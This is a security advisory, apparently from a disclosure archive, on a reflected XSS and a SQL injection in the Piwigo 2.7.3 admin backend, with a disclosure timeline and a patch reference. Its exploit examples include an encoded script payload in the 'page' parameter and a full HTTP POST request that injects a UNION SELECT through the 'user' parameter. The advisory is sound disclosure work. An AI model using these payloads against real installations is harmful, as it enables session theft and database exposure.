CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection

2015.02.19
Credit: Steffen R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <= v. 2.7.3 Advisory ID: SROEADV-2015-06 Author: Steffen Rsemann Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015) Vendor URL: http://piwigo.org Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its administrative backend. ================== Technical Details: ================== The reflecting XSS vulnerability resides in the "page" parameter used in the file admin.php which can be found in the administrative backend located here in a common Piwigo installation: http://{TARGET}/admin.php?page=plugin-AdminTools Exploit-Example: http:// {TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E The SQL injection vulnerability can as well be found in the administrative backend and can be found in the "History" functionality located here: http://{TARGET}/admin.php?page=history The SQL injection vulnerability can be exploited by appending arbitrary SQL statements in a POST request to the parameter "user": Exploit-Example: POST /piwigo/admin.php?page=history HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/piwigo/admin.php?page=history&search_id=82 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit ========= Solution: ========= Install the latest version 2.7.4 (released 17th February 2015). ==================== Disclosure Timeline: ==================== 08-Jan-2015 ? found the vulnerability 09-Jan-2015 - informed the developers 09-Jan-2015 ? release date of this security advisory [without technical details] 09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4) 17-Feb-2015 - vendor releases patch 2.7.4 (see [3]) 17-Feb-2015 - release date of this security advisory 17-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rsemann. =========== References: =========== [1] http://piwigo.org [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html [3] http://piwigo.org/forum/viewtopic.php?id=25179

References:

http://piwigo.org/forum/viewtopic.php?id=25179


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top